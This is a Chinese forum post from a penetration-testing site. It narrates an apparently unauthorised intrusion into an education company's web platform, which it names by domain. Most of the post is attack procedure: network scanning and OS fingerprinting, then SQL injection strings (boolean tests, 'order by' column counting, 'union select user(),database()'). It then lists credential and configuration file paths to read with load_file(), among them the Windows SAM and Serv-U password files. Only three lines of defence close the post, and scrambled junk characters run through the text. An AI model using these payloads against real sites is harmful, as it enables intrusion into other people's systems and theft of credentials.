中国网络渗透测试联盟

标题: 记一次Linux系统PHP注入入侵检测 [打印本页]

作者: admin    时间: 2013-2-16 22:23
标题: 记一次Linux系统PHP注入入侵检测
题记:
( ?* n% e( z! X/ p$ [' Q3 q一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……  |7 I: G  Y0 T( q
第一步:获取需要的信息
+ {/ o/ z3 }# K由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。% }* [7 z" O/ B4 x: D/ U2 Z
注:以下为保护特用XXX代替敏感信息
" x! Z- f' _2 i. E1 ~" S/ I2 ]顺手先PING了一下他们的域名:- I3 @5 k2 H2 I; m5 F' c  A1 b
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
: y; W! t& I2 J* K5 \64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms7 O" s. w& O% {& o$ f
顺便了解一下TTL,学好基础知识才能一路顺风:% I+ [$ C- ]) `) u% b
TTL:(Time To Live ) 生存时间
6 J2 o5 S! T8 g3 n% s  U" h指定数据包被路由器丢弃之前允许通过的网段数量。
) p$ S5 A1 @1 Y. U6 q2 ATTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。4 ~' _- q- D4 o( g0 s) h
使用PING时涉及到的 ICMP 报文类型
7 V1 b1 y& g4 I, J一个为ICMP请求回显(ICMP Echo Request)
6 O& \0 S+ K0 C3 T5 x: Y8 G一个为ICMP回显应答(ICMP Echo Reply): x. F' D! p4 G+ B* c% x
TTL 字段值可以帮助我们识别操作系统类型。
& d- Y9 y# X1 m8 R/ c/ E: r' aUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255/ n5 G) i7 g- A8 L
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
* \& a1 a9 D9 ]- {1 P# v微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128! ~8 J; K! s; V
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32$ m- M" w0 f5 w- l' {4 E. H2 f/ i
当然,返回的TTL值是相同的
. l( n7 Q5 g. X  a( @* A但有些情况下有所特殊$ a2 c4 z" `2 N# ?; _
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 646 J' n0 X7 `# ]2 f( m0 l
FreeBSD 4.1, 4.0, 3.4;
& G1 Y/ w! V& R$ o1 [/ y$ kSun Solaris 2.5.1, 2.6, 2.7, 2.8;+ J: A2 ^* f  l
OpenBSD 2.6, 2.7,
% _8 U2 G4 s0 j. w" ONetBSD: g! v) x8 ?: G. A: x
HP UX 10.20
: C+ ]% S. P3 N' P: W6 HICMP 回显应答的 TTL 字段值为 255; I" t4 I% j5 H2 c* A) w2 e) B  k
Windows 95/98/98SE
6 F7 u/ Q6 n8 vWindows ME4 R  X( z+ l* l5 \: g
ICMP 回显应答的 TTL 字段值为 322 w$ H. u; |- y  N- H0 R
Windows NT4 WRKS& E/ }4 f, {: @8 Z) C& Z
Windows NT4 Server
' H  C: ^0 {# I' S8 wWindows 2000! e5 n' P3 g' [8 `. d6 D4 w
Windows XP- M- l5 J( b; T) ]6 @
ICMP 回显应答的 TTL 字段值为 128
+ @; t! s5 |3 D; s% i; N这样,我们就可以通过这种方法来辨别操作系统1 S1 R# R; \* K# E$ z7 {: c& G
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255' E, }! N6 {0 l( {
用NMAP扫描一下:- m5 w1 r" w# p. E- s) k
nmap -sT -O XXX.XXX.XXX.XXX: Y( A" I" g; y  ?. p5 b/ [  F
如果没有装WinPcap则会弹出提示:
5 g6 n8 M7 g# T) {8 fWARNING: Could not import all necessary WinPcap functions.  You may need to upgr
* E" {" I- [8 l4 H, A& N, H" V0 Xade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
+ j5 u+ L& h: G: e6 @7 c. J: h) mode — Nmap may not function completely+ k$ }( X5 X+ g- L8 }0 w
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
& q% o& B/ K+ Rand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win9 {. Q2 X  g+ ?* y
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
, _1 Y( ]" J$ T4 T) r5 h8 `d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
; v0 _5 K7 C) Y+ I( @ersions, you may be able to take iphlpapi.dll from another system and place it i8 ^# o! C/ `* f3 U) e2 m# f4 t
n your system32 dir (e.g. c:\windows\system32).
  D6 u0 m6 D1 Q. X( P) d8 @QUITTING!- H) x1 {) t$ m3 y8 q6 s& y$ v$ D) G5 R
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
  i1 \& `  U/ Z% R; I0 \5 s安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:% p( ~. Q4 a: T
Interesting ports on XXX.XXX.XXX.XXX:
9 g3 h" H' ]) r0 {Not shown: 986 closed ports: r9 Z% n' d, g" u% p
PORT     STATE    SERVICE
1 y# o9 ?7 v+ J1 i5 U21/tcp   open     ftp
1 Z. N% @1 L1 W! Y5 {22/tcp   open     ssh
, O. _) H7 s! h9 }23/tcp   open     telnet
$ P1 ]* }* w, V6 u% h) X; O80/tcp   open     http  f- t) x' w# t( X+ T( y- N
111/tcp  open     rpcbind. |1 i* C. h( U5 E3 j
135/tcp  filtered msrpc
" M. n* ]; n. c$ Q+ B139/tcp  filtered netbios-ssn
8 p) f' z. D$ _' L445/tcp  filtered microsoft-ds% G5 c$ u! k7 a& m  _6 r
513/tcp  open     login, @9 E1 _: V) H: d1 I1 N9 U$ Q
514/tcp  open     shell6 I8 w5 ~% W& Q; v: ]3 H  U+ j3 C/ e
593/tcp  filtered http-rpc-epmap
9 R8 C/ \, ?, Q+ O' o1720/tcp filtered H.323/Q.931
! I  y6 M: w* c. Z+ ^" m3 u3306/tcp open     mysql
- r1 l  u* \+ G5 _+ O4444/tcp filtered krb524
, [* Z- s( g/ E5 ADevice type: WAP5 e0 Q8 p! B8 a
Running: Linux 2.4.X
1 _  R8 r7 \4 l2 g* nOS details: DD-WRT (Linux 2.4.35s)9 ^% n: n" g7 x# u9 ?, I' ]6 F
Network Distance: 13 hops& o# \. P% C$ `
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
+ u# i/ B" t7 B8 R6 j/ X" u3 x" N% {* P3 ulogin as:
1 @. Y( z8 I. Q$ x; eTelnet23端口也是开着的,用telnet 命令链接一下:
7 k3 s) p5 P4 L! I) A; Xtelnet XXX.XXX.XXX.XXX! N! x5 q/ |* z$ I
提示:1 C2 C1 V7 }: V( B& a* i0 z( b
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
% e5 n! |; ~' D4 T# h# FKernel 2.6.18-92.el5PAE on an i686
% `5 y# f* n% Z5 Z* s8 u# vlogin:
* k0 U7 @0 k5 R- q' _) j* ~* B* W获取HTTP头信息:
7 I: g4 w) n, O3 ]. c在本地执行如下PHP代码
+ ^% B- ~3 l, g2 G/ h3 r<?php
& e5 O: m2 B7 c$url = ‘XXX.XXX.XXX.XXX’;5 P4 V" F+ p+ S6 b
print_r(get_headers($url));
1 f  Q* o2 r7 ^) u+ |& j5 M/ k! \print_r(get_headers($url, 1));" k1 A* I6 \9 A( j
?>1 E  L* f* {1 N% L; r
将以上代码保存为PHP文件,执行:
) q4 Y) O/ k2 ?7 ~Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
7 t: |( K2 D7 c6 V( e现在可以得出结论:
" x- w  n: T& R/ O系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga). [( A9 k; I8 d+ e. p# i$ s
内核版本:Kernel 2.6.18-92.el5PAE on an i686
1 t0 R* O) ~% o) |6 @WEB服务器版本:nginx/0.7.61
. |! ]' J  l1 c, n+ U第二步,开始测试寻找漏洞' K) N* w6 r' g* ~1 p# f7 k# ~
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。& A/ N1 L! o& j4 k$ C4 y
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的/ W3 E+ d2 Z! i  K3 m
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
1 B' d- i7 Z; h+ y- m- C- Xhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常  Y1 H* s) j3 d7 m
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
2 w2 C& Z' _% Q: P. l恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
7 {2 J# I7 w7 g1 \3、手工注入:3 S/ `. i5 }. I
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。% K& d/ r5 x; P$ y3 K6 I" o% R
3.1 猜测当前表字段数
5 \( s6 [7 D2 B: X6 V& Mhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10/ C( n8 g. ~- l- E/ }
此处猜测有个简单的算法,都是有技巧的吗,呵呵4 N' w( a; N. ^& a5 L
算法简单如下:% J& i2 B% n0 \
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;1 l; m4 f9 t2 c4 m9 Z% p. Y! S
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;- s+ O1 Z" Q: i) S; d/ n9 |* |
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。$ d6 P* l' t4 c6 A
以此来判断,是否过界,配合取中算法猜出字段数。6 u6 t3 m( `4 S# z  ?  A
举例:3 i' m: b( s( x6 U! r1 }
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常  \* c  Q$ I$ H0 E
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误; q% _3 M3 |0 v4 O
此时3则为我们要找的字段数。
( I% G% T1 o* r6 J3.2 配合union联合查询字段在页面所位置/ @% o2 W8 r  _0 s4 B7 P# W" Y4 V5 w
我们已经知道了字段数为3,此时则可以做如下操作:
' L, }- @* c3 v; m) ~2 nhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3: k& L9 {) P3 Q$ p3 n1 U, _& @

- ?: z5 e7 B. s8 r/ V7 Y这样就可以测试到哪些字段在页面上有所显示了,如图:+ M! k! a5 _! V+ U1 v9 ^! x

; a( Y, n9 y$ O3 ^) q3.3 查敏感信息
: p2 W0 B, J& P& N& x% B这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
# f. S' y2 [8 Y* d7 \# d% Yhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()7 B7 U8 h; c1 P
3.3.1 先查数据库用户、数据库名,以备后用,如图:
/ ?7 G5 c# e  K+ |% q3 h4 e# k& ?. T0 S" X# w" R1 L
得到数据库用户为root、数据库名为DBxx;
0 @( @3 s8 v+ _, O3.3.2 查配置文件
! m5 F( `, \9 K3 Z, o* A查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。6 ]$ a5 ?* T. e5 e8 L( O0 E" i
查看文件有一定的条件限制:
* C( Y, H7 R+ d% }欲读取文件必须在服务器上* F' h- d  x- ]. V7 W
必须指定文件完整的路径
6 O2 D- `- Z1 p/ o必须有权限读取并且文件必须完全可读
3 R7 Q% N0 A) d$ U5 Q欲读取文件必须小于 max_allowed_packet
% \9 ^5 k+ ?. JMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。( Q8 v2 O+ x/ U# k+ g& x
常用的一些:* Q* Y% x: v! v  g  Q3 \2 _
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件) g. O7 j% C1 w0 v( V
/usr/local/apache2/conf/httpd.conf
/ }- w: H& ]3 y, s( e/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
' ?' Q9 U7 p" R/ O; L( v& Y1 e* w/usr/local/app/php5/lib/php.ini //PHP相关设置' ^4 V, u, a! y
/etc/sysconfig/iptables //从中得到防火墙规则策略" i! H& l" I, ~% M: _" h# Y
/etc/httpd/conf/httpd.conf // apache配置文件* t/ s1 ^  Y& a
/etc/rsyncd.conf //同步程序配置文件. E5 V# M6 z9 [  n$ {# j0 Y
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.  H, f& T/ m- ~4 J% ~
/etc/my.cnf //mysql的配置文件# z  r9 L3 T$ U  R0 H1 L7 G7 g/ I6 c
/etc/redhat-release //系统版本
! E- Y; i/ ^9 d! T9 \. r/etc/issue, B: t- P; \! _0 u$ _
/etc/issue.net8 |# }) V3 H  _" z7 Q' A
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
3 @8 M- |* D( Xc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码, I7 S: U, O( t
c:\Program Files\Serv-U\ServUDaemon.ini/ |; G! y+ u( i# ^
c:\windows\my.ini //MYSQL配置文件  \  |! J: t4 }  p7 c  P) W
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件: d' v9 p' a4 y& W6 o+ o6 U9 k
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
( e  ~4 ?1 q( A0 Pc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码- X& K* u9 R: H% {
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此# y9 Q4 U( _" c* [
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
! B  x: w0 ^- X7 |3 ^2 uC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
$ v& j/ m7 M. ^" r//存储了pcAnywhere的登陆密码& T- M' U  ^* r8 m
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。/ S$ ]* t0 L# i% N* v0 I" N
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
- b7 L, N) ]# s8 y& u$ O7 f最后:防范措施
) S/ `, `; a, X6 ]! f4 Q: ~; R; ]1 g1、修复PHP注入漏洞;
6 y7 ]) u5 C: _7 G/ z' H0 q2、Mysql使用普通权限的用户;
5 N4 u2 e; A: x. k, A3、升级linux内核至最新版本;




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2